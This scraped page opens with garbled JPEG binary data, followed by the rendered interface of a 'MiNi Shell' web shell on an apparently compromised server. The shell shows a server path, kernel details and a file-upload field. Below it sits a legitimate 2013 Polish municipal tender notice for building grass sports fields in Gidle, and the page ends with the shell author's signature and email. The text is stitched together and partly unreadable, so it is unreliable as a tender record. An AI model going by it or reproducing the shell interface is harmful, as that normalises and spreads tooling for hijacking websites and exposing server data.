JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130604/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130604/213894-N-2013.html

<p class="kh_header"><b>Gidle: Budowa boisk rekreacyjnych o nawierzchni naturalnej trawiastej w Gidlach</b><br>
<b>Numer ogłoszenia: 213894 - 2013; data zamieszczenia: 04.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gidle , ul. Pławińska 22, 97-540 Gidle, tel. 034 3272027, faks 034 3272111.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.gidle.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa boisk rekreacyjnych o nawierzchni naturalnej trawiastej w Gidlach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> <br>Przedmiotem zamówienia jest budowa boisk rekreacyjnych o nawierzchni naturalnej trawiastej w Gidlach, na działkach o nr ewidencyjnych gruntu: 105/1, 106/8, 106/5 (obręb Gidle) i 2061 (obręb Pławno), obejmująca:
<br>1) Plantowanie terenu;
<br>2) Budowę boiska do piłki nożnej o wymiarach 40,0m x 61,0m o powierzchni 2.440,0m<sup>2</sup> (pole gry 36,0m x 55,0m) oraz wykonanie 2 szt. piłkochwytów za bramkami, o wysokości 6 m, wykonanych z elastycznej siatki polipropylenowej, montowanej na słupkach stalowych ocynkowanych w rozstawie co 2,5m, słupki na płycie betonowej, długość każdego z piłkowchytów 17,5mb. Boisko do piłki nożnej wyposażone w bramki piłkarskie (2 szt.), wykonane z aluminiowych, owalnych profili, wyposażone w rozpórki dolne i pałąk podtrzymujący, montowane w tulei osadzonej w fundamencie z betonu B-20, wyposażone w siatkę do bramek, wymiar bramki: szerokość 5,0m; wysokość: 2,0m; 
<br>3) Budowę boiska do gry w siatkówkę o wymiarach 30,5m x 24m o powierzchni 732m<sup>2</sup> (pole gry 9mx18m) wraz z montażem słupków do zawieszania siatki, stalowych, ocynkowanych ogniowo, słupki o regulowanej wysokości zawieszenia siatki, z mechanizmem naciągu, montowane w tulei osadzonej w fundamencie z betonu B-20. Boisko wyposażone w siatkę o długości do 10,0m i szerokości 1,0m, czarną z kontrastującymi taśmami górną i dolną (np. w kolorze białym) z antenkami;
<br>4) Budowę boiska do gier i zabaw o wymiarach 30,5m x 24m o powierzchni 732m<sup>2</sup> (pole gry 9mx18m) wraz z montażem słupków stalowych, ocynkowanych ogniowo do zawieszania siatki, słupki o regulowanej wysokości zawieszenia siatki, z mechanizmem naciągu, montowane na fundamencie z betonu B-20. Boisko wyposażone w siatkę o długości do 10m i szerokości 1m, czarną z kontrastującymi taśmami górną i dolną (np. w kolorze białym) z antenkami;
<br>5) Montaż 5 szt. ławek o stelażu metalowym, zamocowanych do stóp betonowych z betonu zbrojonego B-20, siedziska ławek drewniane - zaimpregnowane i pokryte lakierobejcą, bez oparć, długość ławki minimum: 180cm;
<br>6) Dostawa wózka do kredowania linii boisk;
<br>Szczegółowy zakres prac zawiera projekt architektoniczno budowlany oraz specyfikacja techniczna wykonania i odbioru robót.
<br>Wszystkie zastosowane materiały powinny posiadać wymagane atesty i odpowiadać wymogom obowiązujących norm. Roboty należy wykonać zgodnie ze sztuką budowlaną oraz obowiązującymi normami i warunkami technicznymi wykonania i odbioru robót.
<br>Wszystkie materiały i urządzenia przedstawione w dokumentacji z podaniem nazwy producenta należy traktować jako przykładowe. Dopuszcza się zaproponowanie urządzeń równoważnych pod warunkiem zapewnienia takich samych, bądź lepszych parametrów technicznych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.21.40-9, 45.11.12.00-0, 45.21.22.21-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał (zakończył), co najmniej jedną robotę budowlaną odpowiadającą rodzajem przedmiotowi zamówienia i wartości nie mniejszej niż 100.000,00zł brutto. Za robotę budowlaną odpowiadającą rodzajem przedmiotowemu zamówieniu zamawiający uzna roboty polegające na budowie, przebudowie lub rozbudowie boisk sportowych lub rekreacyjnych;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza warunku szczegółowego w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest dysponować osobą do pełnienia funkcji kierownika budowy posiadającą uprawnienia budowlane do kierowania robotami budowlanymi  w specjalności konstrukcyjno - budowlanej;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że posiada środki finansowe lub zdolność kredytową na kwotę nie niższą niż 300.000,00zł oraz, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 250.000,00zł;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy;
<br>2) Kosztorys ofertowy;
<br>3) Dokumenty potwierdzające posiadanie uprawnień/ pełnomocnictw osób składających ofertę,  o ile nie wynikają z przepisów prawa lub z przedstawionych dokumentów rejestrowych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) Przewiduje się możliwość przedłużenia terminu realizacji przedmiotu umowy, o czas opóźnienia, jeżeli takie opóźnienie będzie miało wpływ na wykonanie przedmiotu umowy, w następujących przypadkach:
<br>a) przestojów lub opóźnień zawinionych przez Zamawiającego.
<br>b) działania siły wyższej (np. klęski żywiołowe), mającego bezpośredni wpływ na termin wykonania robót. 
<br>c) wystąpienia szczególnie niesprzyjających warunków atmosferycznych uniemożliwiających wykonanie robót - fakt ten musi mieć odzwierciedlenie w dokumentacji budowy i musi być potwierdzony przez inspektora nadzoru.
<br>d) wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności. 
W przedstawionych przypadkach wystąpienia opóźnień strony ustalą nowe terminy realizacji, z tym że okres przesunięcia terminu zakończenia robót nie może być większy niż okres przerwy lub przestoju;
<br>2) Przewiduje się możliwość zmiany wynagrodzenia należnego wykonawcy w następujących przypadkach:
<br>a) wystąpienia różnic pomiędzy ilością robót przyjętą w kosztorysie ofertowym sporządzonym na podstawie kosztorysu ślepego, a obmiarem rzeczywiście wykonanych robót - wykonawca zobowiązany będzie do sporządzenia kosztorysu różnicowego, a wynagrodzenie należne wykonawcy ulegnie wówczas zmianie o kwotę wynikającą z kosztorysu różnicowego, który musi być zatwierdzony przez inspektora nadzoru i samego zamawiającego;
<br>b) w sytuacji, gdy do wykonania przedmiotu zamówienia wystąpi konieczność  wykonania robót dodatkowych, czyli robót nie przewidzianych w kosztorysie ślepym, a których konieczność wykonania wynika z projektu budowlanego - wówczas wynagrodzenie ulegnie zmianie o wartość określoną na podstawie kosztorysu  przygotowanego przez wykonawcę i zatwierdzonego przez zamawiającego;
<br>c) w przypadku ustawowej zmiany stawki podatku VAT w okresie trwania niniejszej umowy, zmianie ulegnie stawka podatku VAT i  cena łączna.
<br>3) Przewiduje się możliwość zmiany osoby pełniącej funkcję kierownika budowy, w następujących przypadkach:
<br>a) śmierci, choroby lub innych zdarzeń losowych.
<br>b) niewywiązywania się kierownika budowy z obowiązków wynikających z umowy.
<br>c) jeżeli zmiana kierownika budowy stanie się konieczna z innych przyczyn niezależnych od wykonawcy, np. rezygnacja itp.
<br>d) żądania przez Zmawiającego zmiany osoby pełniącej funkcję kierownika budowy, jeżeli zamawiający uzna że osoba ta nie wywiązuje się należycie ze swych obowiązków;
<br>W przypadku zmiany kierownika budowy, nowa osoba przewidziana do pełnienia tej funkcji musi spełniać wymagania określone dla kierownika budowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gidle.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> bezpłatnie w wersji elektronicznej ze strony internetowej www.bip.gidle.pl lub w wersji papierowej w siedzibie zamawiającego Urząd Gminy w Gidlach, ul. Pławińska 22, 97-540 Gidle, pokój nr 2;.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.06.2013 godzina 10:00, miejsce: w siedzibie zamawiającego: Urząd Gminy w Gidlach, ul. Pławińska 22, 97-540 Gidle, pokój nr 9 - Sekretariat (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 18.07.2013.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> <br>1) Zamówienie współfinansowane ze środków Unii Europejskiej w ramach Lokalnej Strategii Rozwoju LGD <i><q>Region Włoszczowski</q></i> w ramach działania 413 Wdrażanie Lokalnych Strategii Rozwoju dla operacji, które odpowiadają warunkom przyznania pomocy w ramach działania <i><q>Odnowa i rozwój wsi</q></i>.
<br>2) Zamawiający przewiduje wniesienie zabezpieczenia należytego wykonania umowy, które służyć będzie pokryciu roszczeń z tytułu niewykonania lub nienależytego wykonania umowy:
<br>a) od wykonawcy, którego oferta zostanie uznana jako najkorzystniejsza wymagane będzie wniesienie, w określonym terminie, przed podpisaniem umowy zabezpieczenia należytego wykonania umowy w wysokości: 10% podanej ceny ofertowej;
<br>b) zabezpieczenie należytego wykonania umowy w niniejszym postępowaniu może być wnoszone jest w jednej lub kilku następujących formach:
<br>- w pieniądzu, przelewem na rachunek bankowy: Bank Spółdzielczy w Żytnie O/Gidle Nr konta: 92 8267 1019 2101 0000 0127 0002 z adnotacją <i><q>Zabezpieczenie należytego wykonania umowy - Budowa boisk rekreacyjnych w Gidlach</q></i>;
<br>- w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym;
<br>- w gwarancjach bankowych;
<br>- w gwarancjach ubezpieczeniowych;
<br>- w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275);
<br>c) sposób przekazania zabezpieczenia w formie innej niż pieniądz - należy złożyć w oryginale do pokoju nr 2 Urzędu Gminy w Gidlach, ul. Pławińska 22, 97-540 Gidle najpóźniej w dniu wyznaczonym na datę podpisania umowy.
<br>d) zabezpieczenie wnoszone w postaci poręczenia lub gwarancji musi zawierać nazwę i adres wykonawcy (w przypadku wykonawców występujących wspólnie - nazwy i adresy wszystkich wykonawców), nazwę beneficjenta (zamawiającego), nazwę gwaranta lub poręczyciela, określenie wierzytelności, która ma być zabezpieczona, oraz zobowiązanie Gwaranta do nieodwołalnego i bezwarunkowego  zapłacenia kwoty zobowiązania na pierwsze pisemne żądanie zapłaty. Gwarant nie może także uzależniać dokonania zapłaty od spełnienia jakichkolwiek dodatkowych warunków lub też od przedłożenia jakiejkolwiek dokumentacji. Treść gwarancji/ poręczenia, należy uzgodnić przed jej wystawieniem z Zamawiającym. 
<br>e) zwrot zabezpieczenia należytego wykonania umowy nastąpi w terminie 30 dni od dnia wykonania zamówienia i uznania przez zamawiającego za należycie wykonane, z zastrzeżeniem kwoty 30% wysokości zabezpieczenia, która pozostawiona zostanie na zabezpieczenie roszczeń z tytułu gwarancji i rękojmi za wady. Pozostawiona kwota zostanie zwrócona nie później niż 15 dni po upływie okresu gwarancji za wady.
<br>f) jeżeli wyłoniony wykonawca nie wniesie w określonym terminie zabezpieczenia należytego wykonania umowy zamawiający może wybrać ofertę najkorzystniejszą spośród pozostałych ofert, bez przeprowadzania ich ponownej oceny, chyba, że zachodzi jedna z przesłanek unieważnienia postępowania.
<br>g) w zakresie zabezpieczenia należytego wykonania umowy obowiązują uregulowania Prawa zamówień publicznych zawarte w art. od 147 do 151.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com